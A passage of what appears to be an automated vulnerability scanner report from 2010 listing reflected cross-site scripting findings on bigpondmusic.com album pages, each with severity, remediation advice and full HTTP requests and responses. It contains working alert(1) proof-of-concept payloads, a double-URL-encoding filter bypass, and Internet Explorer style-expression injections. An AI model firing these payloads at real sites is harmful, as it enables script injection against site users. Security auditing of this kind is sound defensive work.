trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album5b383';9a24d6a46d7';
   s.prop4 = 'angus-julia-stone';
   s.prop5 = 'down-the-way';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.
...[SNIP]...

2.24. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ec0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2da5f79c49 was submitted in the REST URL parameter 1. This input was echoed as 9ec0c"><script>alert(1)</script>a2da5f79c49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album9ec0c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea2da5f79c49/angus-julia-stone/down-the-way HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87987


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album9ec0c"><script>alert(1)</script>a2da5f79c49/angus-julia-stone/down-the-way" />
...[SNIP]...

2.25. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b13a6"style%3d"x%3aexpression(alert(1))"ea60f3dc6d6 was submitted in the h parameter. This input was echoed as b13a6"style="x:expression(alert(1))"ea60f3dc6d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/angus-julia-stone/down-the-way?h=598216448b13a6"style%3d"x%3aexpression(alert(1))"ea60f3dc6d6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123630


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Angus &amp; Julia Stone - Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/angus-julia-stone/down-the-way?h=598216448b13a6"style="x:expression(alert(1))"ea60f3dc6d6" />
...[SNIP]...

2.26. http://bigpondmusic.com/album/angus-julia-stone/down-the-way [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/angus-julia-stone/down-the-way

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94180"style%3d"x%3aexpression(alert(1))"cea24253dac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94180"style="x:expression(alert(1))"cea24253dac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/angus-julia-stone/down-the-way?94180"style%3d"x%3aexpression(alert(1))"cea24253dac=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 123472


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Angus &amp; Julia Stone - Do
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/angus-julia-stone/down-the-way?94180"style="x:expression(alert(1))"cea24253dac=1" />
...[SNIP]...

2.27. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a58b'%3b1ecb978a1bf was submitted in the REST URL parameter 1. This input was echoed as 4a58b';1ecb978a1bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4a58b'%3b1ecb978a1bf/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88067


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4a58b';1ecb978a1bf';
   s.prop4 = 'bon-jovi';
   s.prop5 = 'bon-jovi-greatest-hits-the-ultimate-collection';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1
...[SNIP]...

2.28. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885 was submitted in the REST URL parameter 1. This input was echoed as 30492"><script>alert(1)</script>85c7280a885 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album30492%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e85c7280a885/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88040


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album30492"><script>alert(1)</script>85c7280a885/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection" />
...[SNIP]...

2.29. http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1867"style%3d"x%3aexpression(alert(1))"928c28e0869 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1867"style="x:expression(alert(1))"928c28e0869 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection?f1867"style%3d"x%3aexpression(alert(1))"928c28e0869=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:21:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 152745


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bon Jovi - Bon Jovi Greatest
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bon-jovi/bon-jovi-greatest-hits-the-ultimate-collection?f1867"style="x:expression(alert(1))"928c28e0869=1" />
...[SNIP]...

2.30. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd04fe20e3c was submitted in the REST URL parameter 1. This input was echoed as fd217"><script>alert(1)</script>fd04fe20e3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfd217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efd04fe20e3c/bruno-mars/just-the-way-you-are HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88047


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfd217"><script>alert(1)</script>fd04fe20e3c/bruno-mars/just-the-way-you-are" />
...[SNIP]...

2.31. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d12f4'%3bae96ba96e95 was submitted in the REST URL parameter 1. This input was echoed as d12f4';ae96ba96e95 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumd12f4'%3bae96ba96e95/bruno-mars/just-the-way-you-are HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87936


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumd12f4';ae96ba96e95';
   s.prop4 = 'bruno-mars';
   s.prop5 = 'just-the-way-you-are';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s
...[SNIP]...

2.32. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fcf3"style%3d"x%3aexpression(alert(1))"a271f02fb84 was submitted in the h parameter. This input was echoed as 4fcf3"style="x:expression(alert(1))"a271f02fb84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/bruno-mars/just-the-way-you-are?h=7161732784fcf3"style%3d"x%3aexpression(alert(1))"a271f02fb84 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 100921


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bruno Mars - Just The Way Yo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are?h=7161732784fcf3"style="x:expression(alert(1))"a271f02fb84" />
...[SNIP]...

2.33. http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/bruno-mars/just-the-way-you-are

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b916"style%3d"x%3aexpression(alert(1))"908c6cd8987 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2b916"style="x:expression(alert(1))"908c6cd8987 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/bruno-mars/just-the-way-you-are?2b916"style%3d"x%3aexpression(alert(1))"908c6cd8987=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 100834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Bruno Mars - Just The Way Yo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/bruno-mars/just-the-way-you-are?2b916"style="x:expression(alert(1))"908c6cd8987=1" />
...[SNIP]...

2.34. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98124%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a41ace4660 was submitted in the REST URL parameter 1. This input was echoed as 98124"><script>alert(1)</script>9a41ace4660 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /album98124%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9a41ace4660/cheryl-cole/promise-this2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88229


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album98124"><script>alert(1)</script>9a41ace4660/cheryl-cole/promise-this2" />
...[SNIP]...

2.35. http://bigpondmusic.com/album/cheryl-cole/promise-this2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/cheryl-cole/promise-this2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ea10'%3b746216d7018 was submitted in the REST URL parameter 1. This input was echoed as 8ea10';746216d7018 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album8ea10'%3b746216d7018/cheryl-cole/promise-this2 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
